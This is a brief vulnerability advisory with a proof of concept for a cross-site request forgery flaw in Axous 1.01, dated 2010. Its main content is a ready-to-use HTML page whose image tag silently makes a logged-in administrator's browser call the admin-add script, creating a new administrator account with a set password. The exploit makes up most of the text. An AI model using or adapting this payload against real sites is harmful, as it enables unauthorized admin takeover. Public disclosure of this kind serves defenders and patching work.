Search
Software Vulnerability Tested On Date
Axous 1.01 Cross-site Request Forgery Windows Vista + XAMPP 9/16/2010
Description
A vulnerability in Axous 1.01 can be exploited to create a new admin.
Proof of Concept
<html>
    <body>
        <img src="http://localhost/axous/admin/administrators_add.php?user_name=new_admin&new_passwd=Password1&new_passwd1=Password1&email=test%40test.com&dosubmit=1&id=&action=addnew" />
    </body>
</html>